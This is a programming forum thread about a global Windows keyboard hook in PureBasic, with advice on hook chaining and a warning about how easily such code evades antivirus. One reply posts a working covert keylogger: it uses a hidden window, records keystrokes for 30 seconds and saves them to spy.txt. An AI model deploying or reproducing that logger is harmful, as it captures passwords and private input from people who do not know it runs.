Page 1 of 1
Keyboard hook (windows)
Posted: Sun May 29, 2016 5:52 am
by Lunasole
The following might be good alternative of using GetAsyncKeyState()/GetKeyboardState() or binding global hotkeys.
However I'm not sure it works on Win7 and higher (cannot test now), on XP x86 works fine.
Code: Select all
EnableExplicit
; set some WinAPI constants which PB misses
#KF_EXTENDED = $100
#LLKHF_EXTENDED = (#KF_EXTENDED >> 8)
; procedure to receive hook messages
Procedure KeyMsg (msg.l, WPARAM.l, LPARAM.l)
If (WPARAM = #WM_KEYDOWN Or WPARAM = #WM_SYSKEYDOWN)
Protected *st_hook.KBDLLHOOKSTRUCT = LPARAM
Protected sc = *st_hook\scanCode
Protected vk = *st_hook\vkCode
Debug "IsExtended: " + Str(*st_hook\flags) ; that str(flags) seems not rignt, but generally works
Debug "ScanCode: " + sc
Debug "VirtualKey: " + vk
Debug "------"
; If vk = #VK_ESCAPE ;
;
; EndIf
EndIf
EndProcedure
;;;;;;;;;;;;;;;;;;;;;;;;;;
Define KeyboardHook = SetWindowsHookEx_(#WH_KEYBOARD_LL, @KeyMsg(), GetModuleHandle_(#Null), 0)
OpenWindow(1, 1, 1, 1, 1, "Global keyboard hook test") ; need to have some window, else you cannot receive windows messages
Debug "Press any key in any window..."
Repeat
If WaitWindowEvent(16) = #PB_Event_CloseWindow
Break
EndIf
ForEver
UnhookWindowsHookEx_(KeyboardHook)
Re: Keyboard hook (windows)
Posted: Sun May 29, 2016 11:33 am
by RSBasic
Re: Keyboard hook (windows)
Posted: Sun May 29, 2016 3:47 pm
by Lunasole
Thanks, nice addition to mouse-related stuff
Re: Keyboard hook (windows)
Posted: Sun May 29, 2016 4:54 pm
by netmaestro
For production-quality code you need just a bit more than is shown here. nCode must be tested for negativity and if found, the return value from CallNextHookEx must be returned. In all cases, CallNextHookEx must be called when your procedure either doesn't process the message or when you don't want to eat the message, otherwise your program is preventing the next hook in the chain, should another program be using one, from executing. In short, your program wouldn't be playing nice with the other kids.
MSDN wrote:If nCode is less than zero, the hook procedure must return the value returned by CallNextHookEx.
If nCode is greater than or equal to zero, and the hook procedure did not process the message, it is highly recommended that you call CallNextHookEx and return the value it returns; otherwise, other applications that have installed WH_KEYBOARD_LL hooks will not receive hook notifications and may behave incorrectly as a result. If the hook procedure processed the message, it may return a nonzero value to prevent the system from passing the message to the rest of the hook chain or the target window procedure.
Re: Keyboard hook (windows)
Posted: Sun May 29, 2016 5:34 pm
by Zebuddi123
Just how bad does it get! compiled and ran exe through VirusTotal. fine no problems, my anti virus quite happy with it even after a 15 second check
Now if someone found this program running on their system and check with VirusTotal as I do for comfort!!! It would be all fine and dandy
How many loggers are really on my system? How do I really tell... It is shockingly easy beyond belief
Also it will record everything you type whether its just the desktop thats selected and your typing on no window or editable gadget or the password hidden under your online banking password gadget. Even Tor!!!
and yes I know its directly hooking the keyboard
just wanted to raise the point.
Zebuddi.
Code: Select all
#KF_EXTENDED = $100 : #LLKHF_EXTENDED = (#KF_EXTENDED >> 8) : Global spied_txt.s
Procedure KeyMsg (msg.l, WPARAM.l, LPARAM.l)
If (WPARAM = #WM_KEYDOWN Or WPARAM = #WM_SYSKEYDOWN)
Protected *st_hook.KBDLLHOOKSTRUCT = LPARAM
Protected sc = *st_hook\scanCode
Protected vk = *st_hook\vkCode
spied_txt + Chr(vk)
EndIf
EndProcedure
Define KeyboardHook = SetWindowsHookEx_(#WH_KEYBOARD_LL, @KeyMsg(), GetModuleHandle_(#Null), 0)
OpenWindow(1, 1, 1, 1,1,"", #PB_Window_Invisible)
st = ElapsedMilliseconds()
Repeat : WaitWindowEvent(16) : Until (ElapsedMilliseconds()-st) => 30000 ; record for 30 secs
CloseWindow(1)
If CreateFile(0, GetTemporaryDirectory() + "spy.txt")
WriteString(0, spied_txt)
CloseFile(0)
EndIf
UnhookWindowsHookEx_(KeyboardHook)
Re: Keyboard hook (windows)
Posted: Sun May 29, 2016 6:38 pm
by Lunasole
@netmaestro you say right, but I think this is "secondary", the first is to make your code working well, not wasting time on side-effects until they becoming critical (in this case CallNextHookEx()). It was more valuable will it work on any windows or XP only.
Zebuddi123 wrote:Just how bad does it get! compiled and ran exe through VirusTotal. fine no problems
That looks really funny
Other programs I checked (without any such code) typically triggering half of VirusTotal antiviruses.
Shoudn't not trust any AV in 2016, using well configured firewall (not one from Microsoft) with strict manual rules is enough. The Windows XP users sitting with admin rights were vulrenable for rootkits and other happy soft (also XP had more easy ways to inject malicious code to a kernel mode) - so then viruses were popular and I had to use lot of toolz like RkUnhooker to be sure system is clean, but after using Windows 7 since ~2010 I never seen any serious virus or trojan, just maybe crypto-lockers capturing your precious user files for money still can be dangerous.